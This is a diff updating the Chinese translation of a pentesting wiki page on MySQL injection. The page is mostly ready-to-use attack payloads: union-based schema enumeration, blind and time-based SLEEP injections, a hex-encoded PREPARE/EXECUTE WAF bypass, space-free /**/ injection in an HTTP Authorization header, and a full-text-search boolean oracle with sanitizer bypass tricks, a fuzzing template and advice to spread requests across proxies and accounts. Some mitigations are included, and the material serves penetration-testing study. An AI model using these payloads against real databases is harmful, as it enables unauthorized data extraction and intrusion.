Translated ['', 'src/pentesting-web/sql-injection/mysql-injection/README

src/pentesting-web/sql-injection/mysql-injection/README.md

@@ -1,4 +1,4 @@
-# MySQL 注入
+# MySQL injection
 
 {{#include ../../../banners/hacktricks-training.md}}
 
@@ -48,28 +48,28 @@ strcmp(),mid(),,ldap(),rdap(),left(),rigth(),instr(),sleep()
 ```sql
 SELECT * FROM some_table WHERE double_quotes = "IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR"*/"
 ```
-从 [https://labs.detectify.com/2013/05/29/the-ultimate-sql-injection-payload/](https://labs.detectify.com/2013/05/29/the-ultimate-sql-injection-payload/)
+来自 [https://labs.detectify.com/2013/05/29/the-ultimate-sql-injection-payload/](https://labs.detectify.com/2013/05/29/the-ultimate-sql-injection-payload/)
 
 ## 流程
 
-请记住，在“现代”版本的 **MySQL** 中，您可以将 "_**information_schema.tables**_" 替换为 "_**mysql.innodb_table_stats**_**"**（这可能有助于绕过 WAF）。
+请记住，在 "现代" 版本的 **MySQL** 中，你可以将 "_**information_schema.tables**_" 替换为 "_**mysql.innodb_table_stats**_**"** (这可能有助于绕过 WAFs).
 ```sql
 SELECT table_name FROM information_schema.tables WHERE table_schema=database();#Get name of the tables
 SELECT column_name FROM information_schema.columns WHERE table_name="<TABLE_NAME>"; #Get name of the columns of the table
 SELECT <COLUMN1>,<COLUMN2> FROM <TABLE_NAME>; #Get values
 SELECT user FROM mysql.user WHERE file_priv='Y'; #Users with file privileges
 ```
-### **仅一个值**
+### **只有 1 个值**
 
 - `group_concat()`
 - `Limit X,1`
 
-### **盲注逐个**
+### **Blind one by one**
 
-- `substr(version(),X,1)='r'` 或 `substring(version(),X,1)=0x70` 或 `ascii(substr(version(),X,1))=112`
+- `substr(version(),X,1)='r'` or `substring(version(),X,1)=0x70` or `ascii(substr(version(),X,1))=112`
 - `mid(version(),X,1)='5'`
 
-### **盲注添加**
+### **Blind adding**
 
 - `LPAD(version(),1...lenght(version()),'1')='asd'...`
 - `RPAD(version(),1...lenght(version()),'1')='asd'...`
@@ -79,7 +79,7 @@ SELECT user FROM mysql.user WHERE file_priv='Y'; #Users with file privileges
 
 ## 检测列数
 
-使用简单的 ORDER
+使用一个简单的 ORDER
 ```
 order by 1
 order by 2
@@ -92,7 +92,7 @@ UniOn SeLect 1,2
 UniOn SeLect 1,2,3
 ...
 ```
-## MySQL 联合查询基础
+## MySQL Union Based
 ```sql
 UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,schema_name,0x7c)+fRoM+information_schema.schemata
 UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,table_name,0x7C)+fRoM+information_schema.tables+wHeRe+table_schema=...
@@ -101,67 +101,68 @@ UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,data,0x7C)+fRoM+...
 ```
 ## SSRF
 
-**在这里了解不同的选项以** [**滥用Mysql注入来获取SSRF**](mysql-ssrf.md)**。**
+**在这里了解不同的选项来** [**abuse a Mysql injection to obtain a SSRF**](mysql-ssrf.md)**.**
 
-## WAF绕过技巧
+## WAF 绕过技巧
 
-### 通过预处理语句执行查询
+### 通过 Prepared Statements 执行 queries
 
-当允许堆叠查询时，可以通过将要执行的查询的十六进制表示分配给一个变量（使用SET），然后使用PREPARE和EXECUTE MySQL语句最终执行查询，从而绕过WAF。类似于这样：
+当允许 stacked queries 时，可能可以通过将要执行的 query 的 hex representation 赋值给一个变量（使用 SET），然后使用 PREPARE 和 EXECUTE MySQL 语句来最终执行该 query，从而绕过 WAFs。像下面这样：
 ```
 0); SET @query = 0x53454c45435420534c454550283129; PREPARE stmt FROM @query; EXECUTE stmt; #
 ```
-有关更多信息，请参阅 [this blog post](https://karmainsecurity.com/impresscms-from-unauthenticated-sqli-to-rce)。
+欲了解更多信息，请参阅 [这篇博文](https://karmainsecurity.com/impresscms-from-unauthenticated-sqli-to-rce).
 
 ### Information_schema 替代方案
 
-请记住，在“现代”版本的 **MySQL** 中，您可以将 _**information_schema.tables**_ 替换为 _**mysql.innodb_table_stats**_ 或 _**sys.x$schema_flattened_keys**_ 或 **sys.schema_table_statistics**
+请记住，在现代版本的 **MySQL** 中，你可以将 _**information_schema.tables**_ 替换为 _**mysql.innodb_table_stats**_ 或 _**sys.x$schema_flattened_keys**_ 或 **sys.schema_table_statistics**
 
-### MySQL 注入无逗号
+### MySQLinjection 不使用逗号
 
-选择 2 列而不使用任何逗号 ([https://security.stackexchange.com/questions/118332/how-make-sql-select-query-without-comma](https://security.stackexchange.com/questions/118332/how-make-sql-select-query-without-comma)):
+在不使用任何逗号的情况下选择两列 ([https://security.stackexchange.com/questions/118332/how-make-sql-select-query-without-comma](https://security.stackexchange.com/questions/118332/how-make-sql-select-query-without-comma)):
 ```
 -1' union select * from (select 1)UT1 JOIN (SELECT table_name FROM mysql.innodb_table_stats)UT2 on 1=1#
 ```
-### 检索没有列名的值
+### 在不知道列名的情况下检索值
 
-如果在某个时刻你知道表的名称，但不知道表内列的名称，你可以尝试执行类似的操作来查找有多少列：
+如果你知道表名但不知道表中列名，可以尝试通过执行类似如下的语句来查找表中有多少列：
 ```bash
 # When a True is returned, you have found the number of columns
 select (select "", "") = (SELECT * from demo limit 1);     # 2columns
 select (select "", "", "") < (SELECT * from demo limit 1); # 3columns
 ```
-假设有两列（第一列是ID，另一列是flag），你可以尝试逐个字符地暴力破解flag的内容：
+假设有 2 列（第一列为 ID，第二列为 flag），你可以尝试逐字符对 flag 的内容进行 bruteforce：
 ```bash
 # When True, you found the correct char and can start ruteforcing the next position
 select (select 1, 'flaf') = (SELECT * from demo limit 1);
 ```
-更多信息请见 [https://medium.com/@terjanq/blind-sql-injection-without-an-in-1e14ba1d4952](https://medium.com/@terjanq/blind-sql-injection-without-an-in-1e14ba1d4952)
+More info in [https://medium.com/@terjanq/blind-sql-injection-without-an-in-1e14ba1d4952](https://medium.com/@terjanq/blind-sql-injection-without-an-in-1e14ba1d4952)
 
-### 无空格注入 (`/**/` 注释技巧)
+### Injection without SPACES (`/**/` comment trick)
 
-一些应用程序使用 `sscanf("%128s", buf)` 等函数对用户输入进行清理或解析，这些函数 **在第一个空格字符处停止**。因为 MySQL 将序列 `/**/` 视为注释 *和* 空白，所以可以用它来完全去除有效负载中的正常空格，同时保持查询在语法上有效。
+某些应用使用诸如 `sscanf("%128s", buf)` 的函数对用户输入进行清理或解析，这些函数会**在第一个空格字符处停止**。  
+由于 MySQL 将序列 `/**/` 视为注释 *和* 空白字符，因此它可以用来在保持查询语法有效的同时，完全去除载荷中的普通空格。
 
-示例：基于时间的盲注入绕过空格过滤：
+示例 time-based blind injection 用来绕过空格过滤：
 ```http
 GET /api/fabric/device/status HTTP/1.1
 Authorization: Bearer AAAAAA'/**/OR/**/SLEEP(5)--/**/-'
 ```
-数据库接收为：
+数据库接收到的是：
 ```sql
 ' OR SLEEP(5)-- -'
 ```
-这在以下情况下特别有用：
+这在以下情况尤其有用：
 
-* 可控缓冲区的大小受到限制（例如，`%128s`），并且空格会提前终止输入。
-* 通过 HTTP 头或其他字段注入，其中正常空格被删除或用作分隔符。
-* 与 `INTO OUTFILE` 原语结合使用，以实现完全的预认证 RCE（请参见 MySQL 文件 RCE 部分）。
+* 可控缓冲区大小受限（例如 `%128s`），空格会导致输入过早结束。
+* 通过 HTTP headers 或其他字段进行注入，这些字段会剥离或将普通空格用作分隔符。
+* 与 `INTO OUTFILE` 原语结合可实现完整的 pre-auth RCE（参见 MySQL File RCE 部分）。
 
 ---
 
 ### MySQL 历史
 
-您可以在 MySQL 中查看其他执行，读取表：**sys.x$statement_analysis**
+你可以查看 MySQL 中读取该表的其他执行：**sys.x$statement_analysis**
 
 ### 版本替代**s**
 ```
@@ -169,14 +170,63 @@ mysql> select @@innodb_version;
 mysql> select @@version;
 mysql> select version();
 ```
-## 其他MYSQL注入指南
+## MySQL Full-Text Search (FTS) BOOLEAN MODE operator abuse (WOR)
+
+这不是经典的 SQL 注入。当开发者将用户输入传给 `MATCH(col) AGAINST('...' IN BOOLEAN MODE)` 时，MySQL 会在引号内解析一整套布尔搜索操作符。许多 WAF/SAST 规则只关注打破引号（quote breaking），因此会忽略这一面。
+
+Key points:
+- 操作符在引号内被解析： `+` (must include), `-` (must not include), `*` (trailing wildcard), `"..."` (exact phrase), `()` (grouping), `<`/`>`/`~` (weights)。See MySQL docs.
+- 这允许在不跳出字符串字面量的情况下进行存在/不存在以及前缀测试，例如 `AGAINST('+admin*' IN BOOLEAN MODE)` 用来检测是否存在以 `admin` 开头的任何词。
+- 可用于构建 oracles，例如 “does any row contain a term with prefix X?” 并通过前缀扩展枚举隐藏字符串。
+
+Example query built by the backend:
+```sql
+SELECT tid, firstpost
+FROM threads
+WHERE MATCH(subject) AGAINST('+jack*' IN BOOLEAN MODE);
+```
+If the application returns different responses depending on whether the result set is empty (e.g., redirect vs. error message), that behavior becomes a Boolean oracle that can be used to enumerate private data such as hidden/deleted titles.
+
+Sanitizer bypass patterns (generic):
+- Boundary-trim preserving wildcard: 如果后端通过类似 `(\b.{1,2})(\s)|(\b.{1,2}$)` 的正则对每个词修剪 1–2 个尾随字符，则提交 `prefix*ZZ`。清理器会修剪掉 `ZZ`，但保留 `*`，因此 `prefix*` 得以保留。
+- Early-break stripping: 如果代码按每个词去除操作符，但在遇到任意长度 ≥ min length 的 token 时停止处理，就发送两个 token：第一个是满足长度阈值的垃圾 token，第二个携带操作符 payload。例如：`&&&&& +jack*ZZ` → after cleaning: `+&&&&& +jack*`.
+
+Payload template (URL-encoded):
+```
+keywords=%26%26%26%26%26+%2B{FUZZ}*xD
+```
+- `%26` 是 `&`，`%2B` 是 `+`。尾随的 `xD`（或任何两个字母）会被 cleaner 修剪，但保留 `{FUZZ}*`。
+- 将重定向视为 “match”，错误页面视为 “no match”。不要自动跟随重定向，以便保持 oracle 可观测。
+
+枚举工作流程：
+1) 从 `{FUZZ} = a…z,0…9` 开始，通过 `+a*`, `+b*`, … 找到首字母匹配。
+2) 对于每个正向前缀，分支：`a* → aa* / ab* / …`。重复以恢复整个字符串。
+3) 如果应用实行流量控制，分散请求（proxies、多个账户）。
+
+为什么标题经常 leak 而内容不会：
+- 有些应用仅在对标题/主题进行初步 MATCH 之后才应用可见性检查。如果控制流在过滤之前依赖于 “any results?” 的结果，那么会发生存在性 leak。
+
+缓解措施：
+- 如果不需要 Boolean 逻辑，使用 `IN NATURAL LANGUAGE MODE`，或将用户输入视为字面值（escape/quote 会在其他模式中禁用运算符）。
+- 如果需要 Boolean 模式，在分词（tokenization）后对每个 token 剥离或中和所有 Boolean 运算符（`+ - * " ( ) < > ~`）（不要提前中断）。
+- 在 MATCH 之前应用可见性/授权过滤，或在结果集为空与非空时统一响应（恒定的时延/状态）。
+- 检查其他 DBMS 中的类似功能：PostgreSQL 的 `to_tsquery`/`websearch_to_tsquery`、SQL Server/Oracle/Db2 的 `CONTAINS` 也会解析带引号参数内部的运算符。
+
+注意：
+- Prepared statements 无法防止对 `REGEXP` 或搜索运算符的语义滥用。像 `.*` 这样的输入即使在带引号的 `REGEXP '.*'` 内仍然是一个宽松的正则。使用允许列表 (allow-lists) 或显式保护措施。
+
+## Other MYSQL injection guides
 
 - [PayloadsAllTheThings – MySQL Injection cheatsheet](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MySQL%20Injection.md)
 
-## 参考文献
+## 参考资料
 
 - [PayloadsAllTheThings – MySQL Injection cheatsheet](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MySQL%20Injection.md)
 - [Pre-auth SQLi to RCE in Fortinet FortiWeb (watchTowr Labs)](https://labs.watchtowr.com/pre-auth-sql-injection-to-rce-fortinet-fortiweb-fabric-connector-cve-2025-25257/)
+- [MySQL Full-Text Search – Boolean mode](https://dev.mysql.com/doc/refman/8.4/en/fulltext-boolean.html)
+- [MySQL Full-Text Search – Overview](https://dev.mysql.com/doc/refman/8.4/en/fulltext-search.html)
+- [MySQL REGEXP documentation](https://dev.mysql.com/doc/refman/8.4/en/regexp.html)
+- [ReDisclosure: New technique for exploiting Full-Text Search in MySQL (myBB case study)](https://exploit.az/posts/wor/)
 
 
 {{#include ../../../banners/hacktricks-training.md}}